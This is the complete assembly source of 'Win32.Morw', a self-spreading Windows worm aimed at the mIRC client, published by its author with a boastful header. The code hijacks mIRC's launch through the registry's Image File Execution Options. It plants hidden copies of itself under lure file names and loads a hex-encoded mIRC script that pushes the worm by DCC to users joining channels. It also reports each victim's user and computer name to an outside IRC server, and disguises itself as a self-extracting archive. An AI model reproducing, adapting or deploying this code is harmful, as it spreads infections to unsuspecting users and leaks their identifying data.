;=================================================================================\ ; Win32.Morw | ; (c) by DiA/RRLF | ; www.vx-dia.de.vu - www.rrlf.de.vu | ; | ; Heya, long time ago since i brought you something in asm, but here we go again. | ; This is a worm for the mIRC IRC client. It traps mIRC, means when mIRC gets | ; executed the worm gets executed too. It copys then all necessary files to the | ; system directory, generates and load the mIRC script for spreading. Just | ; look at the script to see how it spreads on the "on JOIN" event. If you ask | ; yourself how to make the script readable, go away kiddie. When the user | ; terminate mIRC, the worm unload the script and delete all temporary files. | ; On every 27th of every month the worm notify the infection to a channel at | ; undernet. Just to be proud of my lil creation. At last i must say sorry, no | ; comments in the source, no extended description here... sucks. But this was | ; a fast one, and the code is also very readable. Have fun with it, and don't | ; forget: DO ANYTHING WITH THIS, BUT AT YOUR OWN RISK. I AM NOT RESPONSIBLE! | ; | ; DiA/RRLF - 06.04.2006 | ;=================================================================================/ include "%fasminc%\win32ax.inc" section "c" code readable writeable executable ;================================================== MorwData: jmp MorwCode CurrentFile rb 256d WormFile rb 256d WormName db "morw.exe", 0 SystemDir rb 256d MircHandle dd ? MircWindowName db "mIRC", 0 FileMap dd ? MircData dd ? MircPath rb 256d MircPathSize db 255d MircRegKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC" MircPathHandle dd ? UninstallString db "UninstallString", 0 StartupInfo STARTUPINFO ProcessInfo PROCESS_INFORMATION ScriptFile db "morw.mrc", 0 ScriptHandle dd ? BytesWritten dd ? ScriptFoot db 13, 10, "}", 13, 10, "}", 13, 10, 0 SystemTime SYSTEMTIME FilesTable db "IrcTool.exe", 10d db "Secure_mIRC.exe", 10d db "SpeedItUp.exe", 10d db "InsultQuotes.pif", 10d db "Instruction.pif", 10d db "Abuse.pif", 10d db "YourFile.exe", 10d db "File.exe", 10d db "Install.exe", 10d db "Funny.scr", 10d db "SexyScreensaver.scr", 10d db "Screensaver.scr", 10d db 0 FileBuffer rb 256d MircScript db 0x76, 0x61, 0x72, 0x20, 0x25, 0x6E, 0x0D, 0x0A, 0x6F, 0x6E, 0x20, 0x31, 0x3A, 0x4A, 0x4F, 0x49 db 0x4E, 0x3A, 0x23, 0x3A, 0x7B, 0x0D, 0x0A, 0x25, 0x6E, 0x20, 0x3D, 0x20, 0x24, 0x6E, 0x69, 0x63 db 0x6B, 0x0D, 0x0A, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6E, 0x20, 0x21, 0x3D, 0x20, 0x24, 0x6D, 0x65 db 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x2F, 0x74, 0x69, 0x6D, 0x65, 0x72, 0x31, 0x20, 0x31, 0x20, 0x36 db 0x30, 0x20, 0x4A, 0x6F, 0x69, 0x6E, 0x53, 0x70, 0x72, 0x65, 0x61, 0x64, 0x0D, 0x0A, 0x7D, 0x0D db 0x0A, 0x7D, 0x0D, 0x0A, 0x41, 0x6C, 0x69, 0x61, 0x73, 0x20, 0x4A, 0x6F, 0x69, 0x6E, 0x53, 0x70 db 0x72, 0x65, 0x61, 0x64, 0x20, 0x7B, 0x0D, 0x0A, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6E, 0x20, 0x21 db 0x3D, 0x20, 0x24, 0x6D, 0x65, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x6D db 0x20, 0x3D, 0x20, 0x24, 0x72, 0x61, 0x6E, 0x64, 0x28, 0x31, 0x2C, 0x20, 0x31, 0x32, 0x29, 0x0D db 0x0A, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x31, 0x29, 0x20, 0x7B, 0x0D, 0x0A db 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68, 0x65, 0x79, 0x2C, 0x20, 0x69, 0x20 db 0x66, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x61, 0x77, 0x73, 0x6F, 0x6D db 0x65, 0x20, 0x69, 0x72, 0x63, 0x20, 0x74, 0x6F, 0x6F, 0x6C, 0x2C, 0x20, 0x68, 0x6F, 0x6C, 0x64 db 0x20, 0x6F, 0x6E, 0x2E, 0x2E, 0x2E, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D db 0x20, 0x49, 0x72, 0x63, 0x54, 0x6F, 0x6F, 0x6C, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D, 0x0D db 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x32, 0x29 db 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68, 0x69, 0x2C db 0x20, 0x69, 0x20, 0x68, 0x61, 0x76, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x6F, 0x6F db 0x6C, 0x20, 0x74, 0x6F, 0x20, 0x73, 0x65, 0x63, 0x75, 0x72, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x72 db 0x20, 0x6D, 0x49, 0x52, 0x43, 0x2C, 0x20, 0x77, 0x61, 0x69, 0x74, 0x2C, 0x20, 0x69, 0x20, 0x73 db 0x65, 0x6E, 0x64, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x53, 0x65 db 0x63, 0x75, 0x72, 0x65, 0x5F, 0x6D, 0x49, 0x52, 0x43, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D db 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x33 db 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x63, 0x68 db 0x65, 0x63, 0x6B, 0x20, 0x6F, 0x75, 0x74, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x6C, 0x69, 0x74 db 0x74, 0x6C, 0x65, 0x20, 0x74, 0x6F, 0x6F, 0x6C, 0x20, 0x74, 0x6F, 0x20, 0x73, 0x70, 0x65, 0x65 db 0x64, 0x20, 0x75, 0x70, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x74, 0x72, 0x61, 0x6E, 0x73, 0x66 db 0x65, 0x72, 0x73, 0x2C, 0x20, 0x69, 0x74, 0x27, 0x73, 0x20, 0x61, 0x77, 0x73, 0x6F, 0x6D, 0x65 db 0x2C, 0x20, 0x73, 0x65, 0x6E, 0x64, 0x2E, 0x2E, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66 db 0x20, 0x3D, 0x20, 0x53, 0x70, 0x65, 0x65, 0x64, 0x49, 0x74, 0x55, 0x70, 0x2E, 0x65, 0x78, 0x65 db 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20 db 0x3D, 0x20, 0x34, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D db 0x20, 0x45, 0x79, 0x21, 0x20, 0x53, 0x6F, 0x6D, 0x65, 0x20, 0x70, 0x65, 0x6F, 0x70, 0x6C, 0x65 db 0x20, 0x6F, 0x6E, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x63, 0x68, 0x61, 0x6E, 0x6E, 0x65, 0x6C db 0x20, 0x74, 0x6F, 0x6C, 0x64, 0x20, 0x6D, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x69, 0x6E, 0x73 db 0x75, 0x6C, 0x74, 0x20, 0x74, 0x68, 0x65, 0x6D, 0x21, 0x20, 0x43, 0x68, 0x65, 0x63, 0x6B, 0x20 db 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x71, 0x75 db 0x6F, 0x74, 0x65, 0x73, 0x21, 0x21, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20 db 0x3D, 0x20, 0x49, 0x6E, 0x73, 0x75, 0x6C, 0x74, 0x51, 0x75, 0x6F, 0x74, 0x65, 0x73, 0x2E, 0x70 db 0x69, 0x66, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25 db 0x6D, 0x20, 0x3D, 0x20, 0x35, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73 db 0x20, 0x3D, 0x20, 0x50, 0x6C, 0x65, 0x61, 0x73, 0x65, 0x20, 0x64, 0x6F, 0x6E, 0x27, 0x74, 0x20 db 0x6D, 0x61, 0x6B, 0x65, 0x20, 0x74, 0x72, 0x6F, 0x75, 0x62, 0x6C, 0x65, 0x20, 0x6F, 0x6E, 0x20 db 0x74, 0x68, 0x69, 0x73, 0x20, 0x63, 0x68, 0x61, 0x6E, 0x6E, 0x65, 0x6C, 0x21, 0x20, 0x53, 0x65 db 0x65, 0x20, 0x74, 0x68, 0x65, 0x73, 0x65, 0x20, 0x69, 0x6E, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74 db 0x69, 0x6F, 0x6E, 0x20, 0x68, 0x6F, 0x77, 0x20, 0x74, 0x6F, 0x20, 0x66, 0x6F, 0x6C, 0x6C, 0x6F db 0x77, 0x20, 0x74, 0x68, 0x65, 0x20, 0x72, 0x75, 0x6C, 0x65, 0x73, 0x20, 0x69, 0x6E, 0x20, 0x74 db 0x68, 0x69, 0x73, 0x20, 0x63, 0x68, 0x61, 0x6E, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25 db 0x66, 0x20, 0x3D, 0x20, 0x49, 0x6E, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x2E db 0x70, 0x69, 0x66, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28 db 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x36, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25 db 0x73, 0x20, 0x3D, 0x20, 0x41, 0x62, 0x75, 0x73, 0x65, 0x21, 0x20, 0x43, 0x68, 0x65, 0x63, 0x6B db 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x6F, 0x72, 0x20, 0x79 db 0x6F, 0x75, 0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20, 0x67, 0x65, 0x74, 0x20, 0x62, 0x61, 0x6E, 0x6E db 0x65, 0x64, 0x21, 0x21, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20 db 0x41, 0x62, 0x75, 0x73, 0x65, 0x2E, 0x70, 0x69, 0x66, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C db 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x37, 0x29, 0x20, 0x7B, 0x0D db 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x61, 0x68, 0x68, 0x2C, 0x20, 0x68 db 0x65, 0x72, 0x65, 0x20, 0x69, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20 db 0x79, 0x6F, 0x75, 0x20, 0x61, 0x73, 0x6B, 0x65, 0x64, 0x20, 0x66, 0x6F, 0x72, 0x2E, 0x2E, 0x0D db 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x59, 0x6F, 0x75, 0x72, 0x46, 0x69 db 0x6C, 0x65, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69 db 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x38, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61 db 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x79, 0x6F, 0x75, 0x72, 0x20, 0x66, 0x69, 0x6C, 0x65 db 0x2C, 0x20, 0x69, 0x20, 0x6A, 0x75, 0x73, 0x74, 0x20, 0x73, 0x65, 0x6E, 0x64, 0x20, 0x69, 0x74 db 0x20, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x6E, 0x6F, 0x77, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72 db 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x46, 0x69, 0x6C, 0x65, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A db 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20 db 0x39, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68 db 0x65, 0x72, 0x65, 0x20, 0x69, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x65, 0x74, 0x75, 0x70 db 0x20, 0x79, 0x6F, 0x75, 0x20, 0x61, 0x73, 0x6B, 0x65, 0x64, 0x20, 0x66, 0x6F, 0x72, 0x21, 0x20 db 0x77, 0x61, 0x69, 0x74, 0x2E, 0x2E, 0x2E, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20 db 0x3D, 0x20, 0x49, 0x6E, 0x73, 0x74, 0x61, 0x6C, 0x6C, 0x2E, 0x65, 0x78, 0x65, 0x0D, 0x0A, 0x7D db 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x31 db 0x30, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x68 db 0x65, 0x68, 0x65, 0x68, 0x65, 0x2C, 0x20, 0x63, 0x68, 0x65, 0x63, 0x6B, 0x20, 0x6F, 0x75, 0x74 db 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x75, 0x6E, 0x6E, 0x79, 0x20, 0x73, 0x63, 0x72, 0x65 db 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x21, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66 db 0x20, 0x3D, 0x20, 0x46, 0x75, 0x6E, 0x6E, 0x79, 0x2E, 0x73, 0x63, 0x72, 0x0D, 0x0A, 0x7D, 0x0D db 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20, 0x31, 0x31 db 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20, 0x77, 0x6F db 0x77, 0x2C, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x61, 0x20, 0x70, 0x72, 0x65 db 0x74, 0x74, 0x79, 0x20, 0x64, 0x61, 0x6D, 0x6E, 0x20, 0x73, 0x65, 0x78, 0x79, 0x20, 0x73, 0x63 db 0x72, 0x65, 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2E, 0x2E, 0x2E, 0x20, 0x63, 0x68, 0x65 db 0x63, 0x6B, 0x20, 0x69, 0x74, 0x2C, 0x20, 0x69, 0x20, 0x73, 0x65, 0x6E, 0x64, 0x2E, 0x2E, 0x2E db 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20, 0x3D, 0x20, 0x53, 0x65, 0x78, 0x79, 0x53 db 0x63, 0x72, 0x65, 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2E, 0x73, 0x63, 0x72, 0x0D, 0x0A db 0x7D, 0x0D, 0x0A, 0x65, 0x6C, 0x73, 0x65, 0x69, 0x66, 0x20, 0x28, 0x25, 0x6D, 0x20, 0x3D, 0x20 db 0x31, 0x32, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x73, 0x20, 0x3D, 0x20 db 0x68, 0x65, 0x72, 0x65, 0x20, 0x69, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x63, 0x72, 0x65 db 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2C, 0x20, 0x77, 0x61, 0x69, 0x74, 0x2C, 0x20, 0x69 db 0x20, 0x64, 0x63, 0x63, 0x20, 0x69, 0x74, 0x0D, 0x0A, 0x76, 0x61, 0x72, 0x20, 0x25, 0x66, 0x20 db 0x3D, 0x20, 0x53, 0x63, 0x72, 0x65, 0x65, 0x6E, 0x73, 0x61, 0x76, 0x65, 0x72, 0x2E, 0x73, 0x63 db 0x72, 0x0D, 0x0A, 0x7D, 0x0D, 0x0A, 0x2F, 0x6D, 0x73, 0x67, 0x20, 0x25, 0x6E, 0x20, 0x25, 0x73 db 0x0D, 0x0A, 0 MorwCode: invoke GetModuleFileName,\ 0,\ CurrentFile,\ 256d invoke GetSystemDirectory,\ SystemDir,\ 256d invoke lstrlen,\ CurrentFile mov ebx, CurrentFile add ebx, eax sub ebx, 8d mov ecx, dword [WormName] cmp dword [ebx], ecx je StartMirc invoke lstrcpy,\ WormFile,\ SystemDir invoke lstrcat,\ WormFile,\ "\" invoke lstrcat,\ WormFile,\ WormName invoke SetFileAttributes,\ WormFile,\ FILE_ATTRIBUTE_NORMAL invoke CopyFile,\ CurrentFile,\ WormFile,\ 0 cmp eax, 0 je NeedRoot invoke SetFileAttributes,\ WormFile,\ FILE_ATTRIBUTE_HIDDEN mov ebx, 1d call UnTrapMirc jmp Exit StartMirc: invoke lstrcpy,\ WormFile,\ CurrentFile invoke lstrcpy,\ CurrentFile,\ SystemDir invoke lstrcat,\ CurrentFile,\ "\MorwBy.DiA" invoke CopyFile,\ WormFile,\ CurrentFile,\ 0 cmp eax, 0 je NeedRoot invoke DeleteFile,\ CurrentFile invoke RegOpenKeyEx,\ HKEY_LOCAL_MACHINE,\ MircRegKey,\ 0,\ KEY_QUERY_VALUE,\ MircPathHandle cmp eax, 0 jne Exit invoke RegQueryValueEx,\ dword [MircPathHandle],\ UninstallString,\ 0,\ 0,\ CurrentFile,\ MircPathSize cmp eax, 0 jne Exit invoke RegCloseKey,\ dword [MircRegKey] invoke lstrlen,\ CurrentFile mov ebx, CurrentFile inc ebx mov ecx, eax sub ecx, 12d invoke lstrcpyn,\ MircPath,\ ebx,\ ecx mov ebx, 0d call UnTrapMirc invoke CreateProcess,\ MircPath,\ 0,\ 0,\ 0,\ 0,\ CREATE_NEW_CONSOLE,\ 0,\ 0,\ StartupInfo,\ ProcessInfo cmp eax, 0 je Exit mov ebx, 1d call UnTrapMirc Check: invoke GetSystemTime,\ SystemTime cmp word [SystemTime.wDay], 27d jne BeginToCopy call Payload BeginToCopy: mov ebx, 1d call CopyDeleteFiles invoke lstrcpy,\ CurrentFile,\ SystemDir invoke lstrcat,\ CurrentFile,\ "\" invoke lstrcat,\ CurrentFile,\ ScriptFile invoke CreateFile,\ CurrentFile,\ GENERIC_WRITE,\ FILE_SHARE_WRITE,\ 0,\ CREATE_ALWAYS,\ FILE_ATTRIBUTE_HIDDEN,\ 0 mov dword [ScriptHandle], eax cmp eax, INVALID_HANDLE_VALUE je Exit invoke lstrlen,\ MircScript invoke WriteFile,\ dword [ScriptHandle],\ MircScript,\ eax,\ BytesWritten,\ 0 invoke lstrcpy,\ CurrentFile,\ "/dcc send -cl %n " invoke lstrcat,\ CurrentFile,\ SystemDir invoke lstrcat,\ CurrentFile,\ "\ $+ %f" invoke lstrcat,\ CurrentFile,\ ScriptFoot invoke lstrlen,\ CurrentFile invoke WriteFile,\ dword [ScriptHandle],\ CurrentFile,\ eax,\ BytesWritten,\ 0 invoke lstrcpy,\ CurrentFile,\ "on 1:EXIT:/unload -rs " invoke lstrcat,\ CurrentFile,\ SystemDir invoke lstrcat,\ CurrentFile,\ "\" invoke lstrcat,\ CurrentFile,\ ScriptFile invoke lstrlen,\ CurrentFile invoke WriteFile,\ dword [ScriptHandle],\ CurrentFile,\ eax,\ BytesWritten,\ 0 invoke CloseHandle,\ dword [ScriptHandle] invoke Sleep,\ 120000d invoke FindWindow,\ MircWindowName,\ 0 mov dword [MircHandle], eax cmp eax, 0 je Exit invoke CreateFileMapping,\ INVALID_HANDLE_VALUE,\ 0,\ PAGE_READWRITE,\ 0,\ 4096d,\ MircWindowName mov dword [FileMap], eax cmp eax, 0 je Exit invoke MapViewOfFile,\ dword [FileMap],\ FILE_MAP_ALL_ACCESS,\ 0,\ 0,\ 0 mov dword [MircData], eax cmp eax, 0 je CloseHandles invoke lstrcpy,\ CurrentFile,\ SystemDir invoke lstrcat,\ CurrentFile,\ "\" invoke lstrcat,\ CurrentFile,\ ScriptFile invoke lstrcpy,\ dword [MircData],\ "//load -rs " invoke lstrcat,\ dword [MircData],\ CurrentFile invoke SendMessage,\ dword [MircHandle],\ WM_USER + 200d,\ 1d,\ 0 WaitForExit: invoke FindWindow,\ MircWindowName,\ 0 cmp eax, 0 je MircTerminated invoke Sleep,\ 1000d jmp WaitForExit MircTerminated: mov ebx, 0d call CopyDeleteFiles invoke lstrcpy,\ CurrentFile,\ SystemDir invoke lstrcat,\ CurrentFile,\ "\" invoke lstrcat,\ CurrentFile,\ ScriptFile invoke DeleteFile,\ CurrentFile CloseHandles: invoke UnmapViewOfFile,\ dword [MircData] invoke CloseHandle,\ dword [FileMap] invoke CloseHandle,\ dword [MircHandle] jmp Exit NeedRoot: invoke MessageBox,\ 0,\ "Please execute this application as Administrator.",\ 0,\ MB_ICONERROR Exit: invoke ExitProcess, 0 UnTrapMirc: jmp UnTrapMircStart RegFileExec db "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options", 0 RegHandle dd ? MircName db "mirc.exe", 0 RegMircHandle dd ? UntrapValue db "", 0 Debugger db "Debugger", 0 UnTrapMircStart: ;in: ebx = trap (1) or untrap (0) ; WormFile = must be path to the installed worm path ;out: eax = error (131313h) or ok (1) invoke RegOpenKeyEx,\ HKEY_LOCAL_MACHINE,\ RegFileExec,\ 0,\ KEY_ALL_ACCESS,\ RegHandle cmp eax, 0 jne UnTrapMircError invoke RegCreateKey,\ dword [RegHandle],\ MircName,\ RegMircHandle cmp eax, 0 jne UnTrapMircError cmp ebx, 1d je TrapMirc mov edx, UntrapValue jmp SetValue TrapMirc: mov edx, WormFile SetValue: invoke lstrlen,\ edx inc eax dec edx invoke RegSetValueEx,\ dword [RegMircHandle],\ Debugger,\ 0,\ REG_SZ,\ edx,\ eax mov ecx, eax UnTrapMircError: invoke RegCloseKey,\ dword [RegMircHandle] invoke RegCloseKey,\ dword [RegHandle] cmp ecx, 0h je UnTrapMircOk mov eax, 131313h jmp UnTrapMircReturn UnTrapMircOk: mov eax, 1d UnTrapMircReturn: ret CopyDeleteFiles: ;in: ebx = Copy (1) or Delete (0) ;out: nothing mov edx, FilesTable mov ecx, 0 GetFileName: cmp byte [edx + ecx], 10d je HaveFileName cmp byte [edx + ecx], 0 je CopyDeleteReturn inc ecx jmp GetFileName HaveFileName: inc ecx push edx push ecx invoke lstrcpyn,\ FileBuffer,\ edx,\ ecx invoke lstrcpy,\ CurrentFile,\ SystemDir invoke lstrcat,\ CurrentFile,\ "\" invoke lstrcat,\ CurrentFile,\ FileBuffer cmp ebx, 0d je DeleteFileX invoke CopyFile,\ WormFile,\ CurrentFile,\ 0 pop ecx pop edx add edx, ecx mov ecx, 0 jmp GetFileName DeleteFileX: invoke SetFileAttributes,\ CurrentFile,\ FILE_ATTRIBUTE_HIDDEN invoke DeleteFile,\ CurrentFile pop ecx pop edx add edx, ecx mov ecx, 0 jmp GetFileName CopyDeleteReturn: ret Payload: jmp PayloadStart WSAData WSADATA SockAddr dw AF_INET SockAddr_Port dw ? SockAddr_IP dd ? SockAddr_Zero rb 8d SocketDesc dd ? CharBuff rb 2d LineBuff rb 256d Pong db "PONG " PongBuff rb 16d UserName rb 26d UserNameSize dd 26d CompName rb 26d CompNameSize dd 26d Nick rb 26d CRLF db 10d, 13d, 0 PayloadStart: invoke GetUserName,\ UserName,\ UserNameSize invoke GetComputerName,\ CompName,\ CompNameSize mov ecx, 0 GenerateNick: cmp ecx, 8d je HaveNick mov al, byte [UserName + ecx] mov byte [Nick + ecx], al inc ecx mov al, byte [CompName + ecx - 1] mov byte [Nick + ecx], al inc ecx jmp GenerateNick HaveNick: invoke lstrcat,\ Nick,\ "morw" invoke lstrlen,\ Nick invoke CharLowerBuff,\ Nick,\ eax invoke WSAStartup,\ 0101h,\ WSAData cmp eax, 0 jne PayloadReturn invoke socket,\ AF_INET,\ SOCK_STREAM,\ 0 mov dword [SocketDesc], eax cmp eax, -1 je PayloadReturn invoke inet_addr,\ "69.16.172.34" mov dword [SockAddr_IP], eax invoke htons,\ 6667d mov word [SockAddr_Port], ax invoke connect,\ dword [SocketDesc],\ SockAddr,\ 16d cmp eax, 0 jne PayloadReturn invoke lstrcpy,\ LineBuff,\ "NICK " invoke lstrcat,\ LineBuff,\ Nick call SendLine invoke lstrcpy,\ LineBuff,\ "USER " invoke lstrcat,\ LineBuff,\ Nick invoke lstrcat,\ LineBuff,\ " 8 * :" invoke lstrcat,\ LineBuff,\ Nick invoke lstrcat,\ LineBuff,\ " " invoke lstrcat,\ LineBuff,\ Nick call SendLine GetMotd: call RecvLine call HandlePing mov ecx, 0 IsMotd: cmp dword [LineBuff + ecx], "MOTD" je HaveMotd cmp byte [LineBuff + ecx], 0d je LineEnd inc ecx jmp IsMotd LineEnd: jmp GetMotd HaveMotd: invoke lstrcpy, LineBuff,\ "JOIN #vx-lab" call SendLine invoke Sleep,\ 1000d invoke lstrcpy,\ LineBuff,\ "PRIVMSG #vx-lab :Win32.Morw got " invoke lstrcat,\ LineBuff,\ UserName invoke lstrcat,\ LineBuff,\ " on " invoke lstrcat,\ LineBuff,\ CompName call SendLine invoke lstrcpy,\ LineBuff,\ "QUIT" call SendLine PayloadReturn: ret RecvLine: invoke lstrcpy,\ LineBuff,\ "" GetLine: invoke recv,\ dword [SocketDesc],\ CharBuff,\ 1d,\ 0 cmp eax, 0 je PayloadReturn cmp byte [CharBuff], 10d je HaveLine invoke lstrcat,\ LineBuff,\ CharBuff jmp GetLine HaveLine: ret SendLine: invoke lstrcat,\ LineBuff,\ CRLF invoke lstrlen,\ LineBuff invoke send,\ dword [SocketDesc],\ LineBuff,\ eax,\ 0 cmp eax, -1 je PayloadReturn ret HandlePing: cmp dword [LineBuff], "PING" jne NoPing invoke lstrcpy,\ PongBuff,\ LineBuff + 6d invoke lstrcpy,\ LineBuff,\ Pong call SendLine NoPing: ret section "i" import data readable writeable ;============================================== library kernel32, "kernel32.dll",\ advapi32, "advapi32.dll",\ user32, "user32.dll",\ winsock, "ws2_32.dll" import kernel32,\ lstrlen, "lstrlenA",\ lstrcpy, "lstrcpyA",\ lstrcat, "lstrcatA",\ lstrcpyn, "lstrcpynA",\ GetModuleFileName, "GetModuleFileNameA",\ GetSystemDirectory, "GetSystemDirectoryA",\ CopyFile, "CopyFileA",\ CreateFileMapping, "CreateFileMappingA",\ MapViewOfFile, "MapViewOfFile",\ UnmapViewOfFile, "UnmapViewOfFile",\ CloseHandle, "CloseHandle",\ CreateProcess, "CreateProcessA",\ Sleep, "Sleep",\ SetFileAttributes, "SetFileAttributesA",\ CreateFile, "CreateFileA",\ DeleteFile, "DeleteFileA",\ WriteFile, "WriteFile",\ GetComputerName, "GetComputerNameA",\ GetSystemTime, "GetSystemTime",\ ExitProcess, "ExitProcess" import advapi32,\ RegOpenKeyEx, "RegOpenKeyExA",\ RegCreateKey, "RegCreateKeyA",\ RegSetValueEx, "RegSetValueExA",\ RegQueryValueEx, "RegQueryValueExA",\ RegCloseKey, "RegCloseKey",\ GetUserName, "GetUserNameA" import user32,\ MessageBox, "MessageBoxA",\ FindWindow, "FindWindowA",\ SendMessage, "SendMessageA",\ CharLowerBuff, "CharLowerBuffA" import winsock,\ WSAStartup, "WSAStartup",\ socket, "socket",\ inet_addr, "inet_addr",\ htons, "htons",\ connect, "connect",\ recv, "recv",\ send, "send" section "r" resource data readable ;===================================== directory RT_ICON, icons,\ RT_GROUP_ICON, group_icons,\ RT_VERSION, versions resource icons,\ 1,\ LANG_NEUTRAL,\ icon_data resource group_icons,\ 17,\ LANG_NEUTRAL,\ main_icon resource versions,\ 1,\ LANG_NEUTRAL,\ version icon main_icon,\ icon_data,\ "Morw.ico" versioninfo version,\ VOS__WINDOWS32, VFT_APP, VFT2_UNKNOWN, LANG_ENGLISH, 0,\ "FileDescription", "Self Extracting Archive",\ "LegalCopyright", "RRLF Compressing Inc.",\ "FileVersion", "1.0",\ "ProductVersion", "1.0",\ "OriginalFilename", "Archive.ZIP"